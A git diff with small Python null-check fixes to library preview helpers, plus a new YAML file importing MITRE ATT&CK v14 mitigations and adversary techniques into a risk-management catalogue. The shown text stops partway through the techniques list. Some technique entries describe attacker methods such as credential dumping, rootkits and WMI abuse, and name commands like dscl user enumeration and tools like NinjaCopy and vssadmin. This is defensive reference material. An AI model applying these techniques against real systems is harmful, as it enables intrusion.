diff --git a/core/helpers.py b/core/helpers.py
index b1594af..541f974 100644
--- a/core/helpers.py
+++ b/core/helpers.py
@@ -230,4 +230,4 @@ def get_sorted_requirements_and_groups_rec(requirements: list, requirement_group
         requirements,
         requirement_groups,
         requirements_assessed,
-        [rg for rg in requirement_groups if not rg.parent_urn])
+        [rg for rg in requirement_groups if not rg.parent_urn] if requirement_groups else [])
diff --git a/library/helpers.py b/library/helpers.py
index dc2416b..c09d53e 100644
--- a/library/helpers.py
+++ b/library/helpers.py
@@ -8,23 +8,24 @@ def preview_library(library) -> list:
     preview = {}
     requirement_groups_list = []
     requirements_list = []
-    if library['objects']['framework'].get('requirement_groups'):
-        for requirement_group in library['objects']['framework']['requirement_groups']:
+    framework = library['objects'].get('framework')
+    if framework:
+        for requirement_group in library['objects']['framework'].get('requirement_groups'):
             requirement_groups_list.append(
                 RequirementGroup(description = requirement_group.get('description'),
                                 name = requirement_group['name'],
                                 urn = requirement_group['urn'],
                                 parent_urn = requirement_group.get('parent_urn')))
-    for requirement in library['objects']['framework']['requirements']:
-        if Requirement.objects.filter(urn=requirement['urn']).exists():
-            requirements_list.append(Requirement.objects.get(urn=requirement['urn']))
-        else:
-            temp_req = Requirement(description = requirement.get('description'),
-                                                    name = requirement['name'],
-                                                    urn = requirement['urn'],
-                                                    parent_urn = requirement.get('parent_urn'),
-                                                    folder = Folder.get_root_folder())
-            requirements_list.append(temp_req)
-    preview['requirement_groups'] = requirement_groups_list
-    preview['requirements'] = requirements_list
+        for requirement in library['objects']['framework'].get('requirements'):
+            if Requirement.objects.filter(urn=requirement['urn']).exists():
+                requirements_list.append(Requirement.objects.get(urn=requirement['urn']))
+            else:
+                temp_req = Requirement(description = requirement.get('description'),
+                                                        name = requirement['name'],
+                                                        urn = requirement['urn'],
+                                                        parent_urn = requirement.get('parent_urn'),
+                                                        folder = Folder.get_root_folder())
+                requirements_list.append(temp_req)
+        preview['requirement_groups'] = requirement_groups_list
+        preview['requirements'] = requirements_list
     return preview
diff --git a/library/libraries/mitre-attack.yaml b/library/libraries/mitre-attack.yaml
new file mode 100644
index 0000000..4066877
--- /dev/null
+++ b/library/libraries/mitre-attack.yaml
@@ -0,0 +1,5252 @@
+urn: urn:intuitem:risk:library:mitre-attack-v14
+locale: en
+name: Mitre ATT&CK v14 - Threats and mitigations
+description: Mitre ATT&CK v14 - Threats and mitigations
+copyright: "Terms of Use\nLICENSE\nThe MITRE Corporation (MITRE) hereby grants you\
+  \ a non-exclusive, royalty-free license to use ATT&CK\xAE for research, development,\
+  \ and commercial purposes. Any copy you make for such purposes is authorized provided\
+  \ that you reproduce MITRE's copyright designation and this license in any such\
+  \ copy.\n\"\xA9 2022 The MITRE Corporation. This work is reproduced and distributed\
+  \ with the permission of The MITRE Corporation.\"\nDISCLAIMERS\nMITRE does not claim\
+  \ ATT&CK enumerates all possibilities for the types of actions and behaviors documented\
+  \ as part of its adversary model and framework of techniques. Using the information\
+  \ contained within ATT&CK to address or cover full categories of techniques will\
+  \ not guarantee full defensive coverage as there may be undisclosed techniques or\
+  \ variations on existing techniques not documented by ATT&CK.\nALL DOCUMENTS AND\
+  \ THE INFORMATION CONTAINED THEREIN ARE PROVIDED ON AN \"AS IS\" BASIS AND THE CONTRIBUTOR,\
+  \ THE ORGANIZATION HE/SHE REPRESENTS OR IS SPONSORED BY (IF ANY), THE MITRE CORPORATION,\
+  \ ITS BOARD OF TRUSTEES, OFFICERS, AGENTS, AND EMPLOYEES, DISCLAIM ALL WARRANTIES,\
+  \ EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTY THAT THE USE OF\
+  \ THE INFORMATION THEREIN WILL NOT INFRINGE ANY RIGHTS OR ANY IMPLIED WARRANTIES\
+  \ OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE."
+version: 1
+objects:
+  security_functions:
+  - urn: urn:intuitem:risk:function:mitre-attack:M1031
+    name: M1031 - Network Intrusion Prevention
+    provider: MITRE ATT&CK
+    description: 'Use intrusion detection signatures to block traffic at network boundaries.
+
+      https://attack.mitre.org/mitigations/M1031
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1016
+    name: M1016 - Vulnerability Scanning
+    provider: MITRE ATT&CK
+    description: 'Vulnerability scanning is used to find potentially exploitable software
+      vulnerabilities to remediate them.
+
+      https://attack.mitre.org/mitigations/M1016
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1035
+    name: M1035 - Limit Access to Resource Over Network
+    provider: MITRE ATT&CK
+    description: 'Prevent access to file shares, remote access to systems, unnecessary
+      services. Mechanisms to limit access may include use of network concentrators,
+      RDP gateways, etc.
+
+      https://attack.mitre.org/mitigations/M1035
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1029
+    name: M1029 - Remote Data Storage
+    provider: MITRE ATT&CK
+    description: 'Use remote security log and sensitive file storage where access
+      can be controlled better to prevent exposure of intrusion detection log data
+      or sensitive information.
+
+      https://attack.mitre.org/mitigations/M1029
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1037
+    name: M1037 - Filter Network Traffic
+    provider: MITRE ATT&CK
+    description: 'Use network appliances to filter ingress or egress traffic and perform
+      protocol-based filtering. Configure software on endpoints to filter network
+      traffic.
+
+      https://attack.mitre.org/mitigations/M1037
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1021
+    name: M1021 - Restrict Web-Based Content
+    provider: MITRE ATT&CK
+    description: 'Restrict use of certain websites, block downloads/attachments, block
+      Javascript, restrict browser extensions, etc.
+
+      https://attack.mitre.org/mitigations/M1021
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1033
+    name: M1033 - Limit Software Installation
+    provider: MITRE ATT&CK
+    description: 'Block users or groups from installing unapproved software.
+
+      https://attack.mitre.org/mitigations/M1033
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1013
+    name: M1013 - Application Developer Guidance
+    provider: MITRE ATT&CK
+    description: 'This mitigation describes any guidance or training given to developers
+      of applications to avoid introducing security weaknesses that an adversary may
+      be able to take advantage of.
+
+      https://attack.mitre.org/mitigations/M1013
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1034
+    name: M1034 - Limit Hardware Installation
+    provider: MITRE ATT&CK
+    description: 'Block users or groups from installing or using unapproved hardware
+      on systems, including USB devices.
+
+      https://attack.mitre.org/mitigations/M1034
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1017
+    name: M1017 - User Training
+    provider: MITRE ATT&CK
+    description: 'Train users to be aware of access or manipulation attempts by an
+      adversary to reduce the risk of successful spearphishing, social engineering,
+      and other techniques that involve user interaction.
+
+      https://attack.mitre.org/mitigations/M1017
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1052
+    name: M1052 - User Account Control
+    provider: MITRE ATT&CK
+    description: 'Configure Windows User Account Control to mitigate risk of adversaries
+      obtaining elevated process access.
+
+      https://attack.mitre.org/mitigations/M1052
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1028
+    name: M1028 - Operating System Configuration
+    provider: MITRE ATT&CK
+    description: 'Make configuration changes related to the operating system or a
+      common feature of the operating system that result in system hardening against
+      techniques.
+
+      https://attack.mitre.org/mitigations/M1028
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1053
+    name: M1053 - Data Backup
+    provider: MITRE ATT&CK
+    description: 'Take and store data backups from end user systems and critical servers.
+      Ensure backup and storage systems are hardened and kept separate from the corporate
+      network to prevent compromise.
+
+      https://attack.mitre.org/mitigations/M1053
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1038
+    name: M1038 - Execution Prevention
+    provider: MITRE ATT&CK
+    description: 'Block execution of code on a system through application control,
+      and/or script blocking.
+
+      https://attack.mitre.org/mitigations/M1038
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1043
+    name: M1043 - Credential Access Protection
+    provider: MITRE ATT&CK
+    description: 'Use capabilities to prevent successful credential access by adversaries;
+      including blocking forms of credential dumping.
+
+      https://attack.mitre.org/mitigations/M1043
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1045
+    name: M1045 - Code Signing
+    provider: MITRE ATT&CK
+    description: 'Enforce binary and application integrity with digital signature
+      verification to prevent untrusted code from executing.
+
+      https://attack.mitre.org/mitigations/M1045
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1039
+    name: M1039 - Environment Variable Permissions
+    provider: MITRE ATT&CK
+    description: 'Prevent modification of environment variables by unauthorized users
+      and groups.
+
+      https://attack.mitre.org/mitigations/M1039
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1057
+    name: M1057 - Data Loss Prevention
+    provider: MITRE ATT&CK
+    description: 'Use a data loss prevention (DLP) strategy to categorize sensitive
+      data, identify data formats indicative of personal identifiable information
+      (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data
+      Loss Prevention)
+
+      https://attack.mitre.org/mitigations/M1057
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1025
+    name: M1025 - Privileged Process Integrity
+    provider: MITRE ATT&CK
+    description: 'Protect processes with high privileges that can be used to interact
+      with critical system components through use of protected process light, anti-process
+      injection defenses, or other process integrity enforcement measures.
+
+      https://attack.mitre.org/mitigations/M1025
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1055
+    name: M1055 - Do Not Mitigate
+    provider: MITRE ATT&CK
+    description: 'This category is to associate techniques that mitigation might increase
+      risk of compromise and therefore mitigation is not recommended.
+
+      https://attack.mitre.org/mitigations/M1055
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1056
+    name: M1056 - Pre-compromise
+    provider: MITRE ATT&CK
+    description: 'This category is used for any applicable mitigation activities that
+      apply to techniques occurring before an adversary gains Initial Access, such
+      as Reconnaissance and Resource Development techniques.
+
+      https://attack.mitre.org/mitigations/M1056
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1020
+    name: M1020 - SSL/TLS Inspection
+    provider: MITRE ATT&CK
+    description: 'Break and inspect SSL/TLS sessions to look at encrypted web traffic
+      for adversary activity.
+
+      https://attack.mitre.org/mitigations/M1020
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1046
+    name: M1046 - Boot Integrity
+    provider: MITRE ATT&CK
+    description: 'Use secure methods to boot a system and verify the integrity of
+      the operating system and loading mechanisms.
+
+      https://attack.mitre.org/mitigations/M1046
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1030
+    name: M1030 - Network Segmentation
+    provider: MITRE ATT&CK
+    description: 'Architect sections of the network to isolate critical systems, functions,
+      or resources. Use physical and logical segmentation to prevent access to potentially
+      sensitive systems and information. Use a DMZ to contain any internet-facing
+      services that should not be exposed from the internal network. Configure separate
+      virtual private cloud (VPC) instances to isolate critical cloud systems.
+
+      https://attack.mitre.org/mitigations/M1030
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1019
+    name: M1019 - Threat Intelligence Program
+    provider: MITRE ATT&CK
+    description: 'A threat intelligence program helps an organization generate their
+      own threat intelligence information and track trends to inform defensive priorities
+      to mitigate risk.
+
+      https://attack.mitre.org/mitigations/M1019
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1027
+    name: M1027 - Password Policies
+    provider: MITRE ATT&CK
+    description: 'Set and enforce secure password policies for accounts.
+
+      https://attack.mitre.org/mitigations/M1027
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1040
+    name: M1040 - Behavior Prevention on Endpoint
+    provider: MITRE ATT&CK
+    description: 'Use capabilities to prevent suspicious behavior patterns from occurring
+      on endpoint systems. This could include suspicious process, file, API call,
+      etc. behavior.
+
+      https://attack.mitre.org/mitigations/M1040
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1018
+    name: M1018 - User Account Management
+    provider: MITRE ATT&CK
+    description: 'Manage the creation, modification, use, and permissions associated
+      to user accounts.
+
+      https://attack.mitre.org/mitigations/M1018
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1022
+    name: M1022 - Restrict File and Directory Permissions
+    provider: MITRE ATT&CK
+    description: 'Restrict access by setting directory and file permissions that are
+      not specific to users or privileged accounts.
+
+      https://attack.mitre.org/mitigations/M1022
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1026
+    name: M1026 - Privileged Account Management
+    provider: MITRE ATT&CK
+    description: 'Manage the creation, modification, use, and permissions associated
+      to privileged accounts, including SYSTEM and root.
+
+      https://attack.mitre.org/mitigations/M1026
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1024
+    name: M1024 - Restrict Registry Permissions
+    provider: MITRE ATT&CK
+    description: 'Restrict the ability to modify certain hives or keys in the Windows
+      Registry.
+
+      https://attack.mitre.org/mitigations/M1024
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1049
+    name: M1049 - Antivirus/Antimalware
+    provider: MITRE ATT&CK
+    description: 'Use signatures or heuristics to detect malicious software.
+
+      https://attack.mitre.org/mitigations/M1049
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1032
+    name: M1032 - Multi-factor Authentication
+    provider: MITRE ATT&CK
+    description: 'Use two or more pieces of evidence to authenticate to a system;
+      such as username and password in addition to a token from a physical smart card
+      or token generator.
+
+      https://attack.mitre.org/mitigations/M1032
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1054
+    name: M1054 - Software Configuration
+    provider: MITRE ATT&CK
+    description: 'Implement configuration changes to software (other than the operating
+      system) to mitigate security risks associated to how the software operates.
+
+      https://attack.mitre.org/mitigations/M1054
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1048
+    name: M1048 - Application Isolation and Sandboxing
+    provider: MITRE ATT&CK
+    description: 'Restrict execution of code to a virtual environment on or in transit
+      to an endpoint system.
+
+      https://attack.mitre.org/mitigations/M1048
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1047
+    name: M1047 - Audit
+    provider: MITRE ATT&CK
+    description: 'Perform audits or scans of systems, permissions, insecure software,
+      insecure configurations, etc. to identify potential weaknesses.
+
+      https://attack.mitre.org/mitigations/M1047
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1050
+    name: M1050 - Exploit Protection
+    provider: MITRE ATT&CK
+    description: 'Use capabilities to detect and block conditions that may lead to
+      or be indicative of a software exploit occurring.
+
+      https://attack.mitre.org/mitigations/M1050
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1015
+    name: M1015 - Active Directory Configuration
+    provider: MITRE ATT&CK
+    description: 'Configure Active Directory to prevent use of certain techniques;
+      use SID Filtering, etc.
+
+      https://attack.mitre.org/mitigations/M1015
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1051
+    name: M1051 - Update Software
+    provider: MITRE ATT&CK
+    description: 'Perform regular software updates to mitigate exploitation risk.
+
+      https://attack.mitre.org/mitigations/M1051
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1044
+    name: M1044 - Restrict Library Loading
+    provider: MITRE ATT&CK
+    description: 'Prevent abuse of library loading mechanisms in the operating system
+      and software to load untrusted code by configuring appropriate library loading
+      mechanisms and investigating potential vulnerable software.
+
+      https://attack.mitre.org/mitigations/M1044
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1042
+    name: M1042 - Disable or Remove Feature or Program
+    provider: MITRE ATT&CK
+    description: 'Remove or deny access to unnecessary and potentially vulnerable
+      software to prevent abuse by adversaries.
+
+      https://attack.mitre.org/mitigations/M1042
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1036
+    name: M1036 - Account Use Policies
+    provider: MITRE ATT&CK
+    description: 'Configure features related to account use like login attempt lockouts,
+      specific login times, etc.
+
+      https://attack.mitre.org/mitigations/M1036
+
+      '
+    version: '1.0'
+  - urn: urn:intuitem:risk:function:mitre-attack:M1041
+    name: M1041 - Encrypt Sensitive Information
+    provider: MITRE ATT&CK
+    description: 'Protect sensitive information with strong encryption.
+
+      https://attack.mitre.org/mitigations/M1041
+
+      '
+    version: '1.0'
+  threats:
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1047
+    name: T1047 - Windows Management Instrumentation
+    provider: MITRE ATT&CK
+    description: 'Adversaries may abuse Windows Management Instrumentation (WMI) to
+      execute malicious commands and payloads. WMI is an administration feature that
+      provides a uniform environment to access Windows system components. The WMI
+      service enables both local and remote access, though the latter is facilitated
+      by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed
+      Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM)
+      and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006)
+      (WinRM).(Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas
+      WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation:
+      MSDN WMI)(Citation: FireEye WMI 2015)
+
+
+      An adversary can use WMI to interact with local and remote systems and use it
+      as a means to execute various behaviors, such as gathering information for Discovery
+      as well as remote Execution of files as part of Lateral Movement. (Citation:
+      FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)
+
+      https://attack.mitre.org/techniques/T1047'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1113
+    name: T1113 - Screen Capture
+    provider: MITRE ATT&CK
+    description: 'Adversaries may attempt to take screen captures of the desktop to
+      gather information over the course of an operation. Screen capturing functionality
+      may be included as a feature of a remote access tool used in post-compromise
+      operations. Taking a screenshot is also typically possible through native utilities
+      or API calls, such as <code>CopyFromScreen</code>, <code>xwd</code>, or <code>screencapture</code>.(Citation:
+      CopyFromScreen .NET)(Citation: Antiquated Mac Malware)
+
+      https://attack.mitre.org/techniques/T1113'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1037
+    name: T1037 - Boot or Logon Initialization Scripts
+    provider: MITRE ATT&CK
+    description: "Adversaries may use scripts automatically executed at boot or logon\
+      \ initialization to establish persistence. Initialization scripts can be used\
+      \ to perform administrative functions, which may often execute other programs\
+      \ or send information to an internal logging server. These scripts can vary\
+      \ based on operating system and whether applied locally or remotely.  \n\nAdversaries\
+      \ may use these scripts to maintain persistence on a single system. Depending\
+      \ on the access configuration of the logon scripts, either local credentials\
+      \ or an administrator account may be necessary. \n\nAn adversary may also be\
+      \ able to escalate their privileges since some boot or logon initialization\
+      \ scripts run with higher privileges.\nhttps://attack.mitre.org/techniques/T1037"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1557
+    name: T1557 - Adversary-in-the-Middle
+    provider: MITRE ATT&CK
+    description: 'Adversaries may attempt to position themselves between two or more
+      networked devices using an adversary-in-the-middle (AiTM) technique to support
+      follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+      [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+      or replay attacks ([Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212)).
+      By abusing features of common networking protocols that can determine the flow
+      of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device
+      to communicate through an adversary controlled system so they can collect information
+      or perform additional actions.(Citation: Rapid7 MiTM Basics)
+
+
+      For example, adversaries may manipulate victim DNS settings to enable other
+      malicious activities such as preventing/redirecting users from accessing legitimate
+      sites and/or pushing additional malware.(Citation: ttint_rat)(Citation: dns_changer_trojans)(Citation:
+      ad_blocker_with_miner) Adversaries may also manipulate DNS and leverage their
+      position in order to intercept user credentials and session cookies.(Citation:
+      volexity_0day_sophos_FW) [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)s
+      can also be used to establish an AiTM position, such as by negotiating a less
+      secure, deprecated, or weaker version of communication protocol (SSL/TLS) or
+      encryption algorithm.(Citation: mitm_tls_downgrade_att)(Citation: taxonomy_downgrade_att_tls)(Citation:
+      tlseminar_downgrade_att)
+
+
+      Adversaries may also leverage the AiTM position to attempt to monitor and/or
+      modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).
+      Adversaries can setup a position similar to AiTM to prevent traffic from flowing
+      to the appropriate destination, potentially to [Impair Defenses](https://attack.mitre.org/techniques/T1562)
+      and/or in support of a [Network Denial of Service](https://attack.mitre.org/techniques/T1498).
+
+      https://attack.mitre.org/techniques/T1557'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1033
+    name: T1033 - System Owner/User Discovery
+    provider: MITRE ATT&CK
+    description: 'Adversaries may attempt to identify the primary user, currently
+      logged in user, set of users that commonly uses a system, or whether a user
+      is actively using the system. They may do this, for example, by retrieving account
+      usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003).
+      The information may be collected in a number of different ways using other Discovery
+      techniques, because user and username details are prevalent throughout a system
+      and include running process ownership, file/directory ownership, session information,
+      and system logs. Adversaries may use the information from [System Owner/User
+      Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery
+      to shape follow-on behaviors, including whether or not the adversary fully infects
+      the target and/or attempts specific actions.
+
+
+      Various utilities and commands may acquire this information, including <code>whoami</code>.
+      In macOS and Linux, the currently logged in user can be identified with <code>w</code>
+      and <code>who</code>. On macOS the <code>dscl . list /Users | grep -v ''_''</code>
+      command can also be used to enumerate user accounts. Environment variables,
+      such as <code>%USERNAME%</code> and <code>$USER</code>, may also be used to
+      access this information.
+
+
+      On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008)
+      commands such as `show users` and `show ssh` can be used to display users currently
+      logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT
+      TA18-106A Network Infrastructure Devices 2018)
+
+      https://attack.mitre.org/techniques/T1033'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1583
+    name: T1583 - Acquire Infrastructure
+    provider: MITRE ATT&CK
+    description: 'Adversaries may buy, lease, or rent infrastructure that can be used
+      during targeting. A wide variety of infrastructure exists for hosting and orchestrating
+      adversary operations. Infrastructure solutions include physical or cloud servers,
+      domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally,
+      botnets are available for rent or purchase.
+
+
+      Use of these infrastructure solutions allows adversaries to stage, launch, and
+      execute operations. Solutions may help adversary operations blend in with traffic
+      that is seen as normal, such as contacting third-party web services or acquiring
+      infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090),
+      including from residential proxy services.(Citation: amnesty_nso_pegasus)(Citation:
+      FBI Proxies Credential Stuffing)(Citation: Mandiant APT29 Microsoft 365 2022)
+      Depending on the implementation, adversaries may use infrastructure that makes
+      it difficult to physically tie back to them as well as utilize infrastructure
+      that can be rapidly provisioned, modified, and shut down.
+
+      https://attack.mitre.org/techniques/T1583'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1613
+    name: T1613 - Container and Resource Discovery
+    provider: MITRE ATT&CK
+    description: "Adversaries may attempt to discover containers and other resources\
+      \ that are available within a containers environment. Other resources may include\
+      \ images, deployments, pods, nodes, and other information such as the status\
+      \ of a cluster.\n\nThese resources can be viewed within web applications such\
+      \ as the Kubernetes dashboard or can be queried via the Docker and Kubernetes\
+      \ APIs.(Citation: Docker API)(Citation: Kubernetes API) In Docker, logs may\
+      \ leak information about the environment, such as the environment\u2019s configuration,\
+      \ which services are available, and what cloud provider the victim may be utilizing.\
+      \ The discovery of these resources may inform an adversary\u2019s next steps\
+      \ in the environment, such as how to perform lateral movement and which methods\
+      \ to utilize for execution.\nhttps://attack.mitre.org/techniques/T1613"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1592
+    name: T1592 - Gather Victim Host Information
+    provider: MITRE ATT&CK
+    description: 'Adversaries may gather information about the victim''s hosts that
+      can be used during targeting. Information about hosts may include a variety
+      of details, including administrative data (ex: name, assigned IP, functionality,
+      etc.) as well as specifics regarding its configuration (ex: operating system,
+      language, etc.).
+
+
+      Adversaries may gather this information in various ways, such as direct collection
+      actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or
+      [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries
+      may also compromise sites then include malicious content designed to collect
+      host information from visitors.(Citation: ATT ScanBox) Information about hosts
+      may also be exposed to adversaries via online or other accessible data sets
+      (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search
+      Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering
+      this information may reveal opportunities for other forms of reconnaissance
+      (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
+      or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)),
+      establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587)
+      or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or
+      initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195)
+      or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+      https://attack.mitre.org/techniques/T1592'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1003
+    name: T1003 - OS Credential Dumping
+    provider: MITRE ATT&CK
+    description: 'Adversaries may attempt to dump credentials to obtain account login
+      and credential material, normally in the form of a hash or a clear text password,
+      from the operating system and software. Credentials can then be used to perform
+      [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted
+      information.
+
+
+      Several of the tools mentioned in associated sub-techniques may be used by both
+      adversaries and professional security testers. Additional custom tools likely
+      exist as well.
+
+      https://attack.mitre.org/techniques/T1003'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1129
+    name: T1129 - Shared Modules
+    provider: MITRE ATT&CK
+    description: 'Adversaries may execute malicious payloads via loading shared modules.
+      Shared modules are executable files that are loaded into processes to provide
+      access to reusable code, such as specific custom functions or invoking OS API
+      functions (i.e., [Native API](https://attack.mitre.org/techniques/T1106)).
+
+
+      Adversaries may use this functionality as a way to execute arbitrary payloads
+      on a victim system. For example, adversaries can modularize functionality of
+      their malware into shared objects that perform various functions such as managing
+      C2 network communications or execution of specific actions on objective.
+
+
+      The Linux & macOS module loader can load and execute shared objects from arbitrary
+      local paths. This functionality resides in `dlfcn.h` in functions such as `dlopen`
+      and `dlsym`. Although macOS can execute `.so` files, common practice uses `.dylib`
+      files.(Citation: Apple Dev Dynamic Libraries)(Citation: Linux Shared Libraries)(Citation:
+      RotaJakiro 2021 netlab360 analysis)(Citation: Unit42 OceanLotus 2017)
+
+
+      The Windows module loader can be instructed to load DLLs from arbitrary local
+      paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality
+      resides in `NTDLL.dll` and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106)
+      which is called from functions like `LoadLibrary` at run time.(Citation: Microsoft
+      DLL)
+
+      https://attack.mitre.org/techniques/T1129'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1602
+    name: T1602 - Data from Configuration Repository
+    provider: MITRE ATT&CK
+    description: 'Adversaries may collect data related to managed devices from configuration
+      repositories. Configuration repositories are used by management systems in order
+      to configure, manage, and control data on remote systems. Configuration repositories
+      may also facilitate remote access and administration of devices.
+
+
+      Adversaries may target these repositories in order to collect large quantities
+      of sensitive system administration data. Data from configuration repositories
+      may be exposed by various protocols and software and can store a wide variety
+      of data, much of which may align with adversary Discovery objectives.(Citation:
+      US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)
+
+      https://attack.mitre.org/techniques/T1602'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1006
+    name: T1006 - Direct Volume Access
+    provider: MITRE ATT&CK
+    description: 'Adversaries may directly access a volume to bypass file access controls
+      and file system monitoring. Windows allows programs to have direct access to
+      logical volumes. Programs with direct access may read and write files directly
+      from the drive by analyzing file system data structures. This technique may
+      bypass Windows file access controls as well as file system monitoring tools.
+      (Citation: Hakobyan 2009)
+
+
+      Utilities, such as `NinjaCopy`, exist to perform these actions in PowerShell.(Citation:
+      Github PowerSploit Ninjacopy) Adversaries may also use built-in or third-party
+      utilities (such as `vssadmin`, `wbadmin`, and [esentutl](https://attack.mitre.org/software/S0404))
+      to create shadow copies or backups of data from system volumes.(Citation: LOLBAS
+      Esentutl)
+
+      https://attack.mitre.org/techniques/T1006'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1014
+    name: T1014 - Rootkit
+    provider: MITRE ATT&CK
+    description: "Adversaries may use rootkits to hide the presence of programs, files,\
+      \ network connections, services, drivers, and other system components. Rootkits\
+      \ are programs that hide the existence of malware by intercepting/hooking and\
+      \ modifying operating system API calls that supply system information. (Citation:\
+      \ Symantec Windows Rootkits) \n\nRootkits or rootkit enabling functionality\
+      \ may reside at the user or kernel level in the operating system or lower, to\
+      \ include a hypervisor, Master Boot Record, or [System Firmware](https://attack.mitre.org/techniques/T1542/001).\
